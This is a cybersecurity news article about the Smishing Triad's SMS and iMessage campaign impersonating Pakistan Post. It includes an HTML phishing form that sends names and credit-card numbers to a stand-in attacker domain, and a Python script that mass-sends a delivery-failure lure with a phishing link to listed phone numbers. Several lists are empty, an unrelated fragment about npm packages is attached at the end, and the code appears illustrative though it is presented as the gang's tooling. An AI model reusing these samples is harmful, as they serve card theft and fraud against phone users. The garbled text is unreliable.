Discover how the Smishing Triad's latest scheme targets Pakistan Post, exploiting SMS and iMessage to steal personal and financial information.

Continue reading
A new wave of cybercrime has struck Pakistan as the notorious Smishing Triad expands its reach. This group's latest campaign targets unsuspecting mobile users, disguising as Pakistan Post to steal personal and financial information.
Leveraging stolen data and sophisticated smishing tactics, they aim to exploit Pakistan's recent data breaches, marking a significant escalation in their global operations.
The latest campaign targets Pakistan Post customers via iMessage and SMS. Previously, this group targeted users in the USA, EU, UAE, and KSA.

*Data Trail (resecurity)*
The Smishing Triad sends 50,000–100,000 malicious messages daily. These messages use databases of stolen personal data. The databases, often obtained from the dark web, contain phone numbers and other personal information.
In Pakistan, the Triad has targeted customers of major mobile carriers like Jazz/Warid, Zong, Telenor Pakistan, and Ufone.

*iOS Message Distribution (resecurity)*
The primary vector involves sending SMS or iMessages that appear to be from Pakistan Post. These messages typically inform the recipient of a failed package delivery and prompt them to update their address via a link.
Clicking the link redirects users to a fake website resembling Pakistan Post’s official site. This site asks for personal and financial details, ostensibly to cover redelivery fees.
The smishing kits used by the Triad include consistent code and templates. These kits are highly sophisticated and automated, allowing large-scale message distribution.
<form action="https://fake-pakistan-post.com/verify" method="POST">
<label for="name">Name:</label>
<input type="text" id="name" name="name">
<label for="credit_card">Credit Card:</label>
<input type="text" id="credit_card" name="credit_card">
<button type="submit">Submit</button>
</form>The domains used for these campaigns are frequently registered through anonymous services. Examples include:
These domains are often registered via NameSilo, LLC, and utilize URL shortening services to obscure the malicious URLs.

*phishing page (resecurity)
To process the stolen data at scale, the Triad uses various automation tools. These tools help in crafting and sending large volumes of smishing messages efficiently.
import requests
def send_sms(phone_number, message):
payload = {'to': phone_number, 'text': message}
response = requests.post("https://sms-gateway.com/send", data=payload)
return response.status_code
phone_numbers = ["+923361021455", "+923301956704", "+923315640313"]
message = "Your package delivery failed. Update your address at https://pk-post-goi.xyz"
for number in phone_numbers:
send_sms(number, message)Telecom operators must enhance their fraud detection systems. Proactive measures include:
PKCERT has issued advisories highlighting the patterns of smishing activities. They urge citizens to:
The Smishing Triad is believed to consist of Chinese-speaking cybercriminals. Their activities align with previous patterns observed in different regions, targeting postal services and leveraging dark web data.
The expansion to Pakistan is part of a broader strategy. Previous campaigns in the EU and the UAE show similar methods and targets.
Resecurity has provided several IOCs to aid in identifying and mitigating these threats:

148 malicious npm packages masquerading as student proxy and school Wi-Fi bypass tools. Rather than compromising developers during installation